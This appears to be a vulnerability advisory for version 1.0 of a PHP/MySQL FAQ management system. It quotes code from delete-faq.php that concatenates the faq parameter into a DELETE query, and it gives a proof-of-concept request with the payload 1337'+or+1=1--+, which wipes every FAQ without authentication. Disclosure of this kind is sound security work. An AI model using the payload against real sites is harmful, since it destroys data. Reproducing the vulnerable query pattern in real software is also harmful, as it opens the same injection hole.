Credits:
Reigz Macolor (https://github.com/reigz/)
Tested On:
Affected Version:
FAQ Management System Using PHP and MySQL 1.0
Affected Site Page:
/faq-management-system/endpoint/delete-faq.php
Affected Code:
</delete-faq.php>
Even if there's an attempt to use prepared statements, the code actually recieves the user input via faq
parameter and writes into $query
.
...
if (isset($_GET['faq'])) {
$faq = $_GET['faq'];
try {
$query = "DELETE FROM tbl_faq WHERE tbl_faq_id = '$faq'";
$stmt = $conn->prepare($query);
$query_execute = $stmt->execute();
...
Related CWE:
CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Allows SQL Injection by placing untrusted code executing a query on the backend, for the POC all FAQs are deleted without any authentication
Execute Delete query using payload 1337'+or+1=1--+
via the faq
parameter.
GET /faq-management-system/endpoint/delete-faq.php?faq=1337'+or+1=1--+ HTTP/1.1
Host: localhost
Connection: close
DELETES all FAQs without authentication.
As an attacker, can do the following:
- Run any database query and have same permission as the web application (default for this Web Application is root).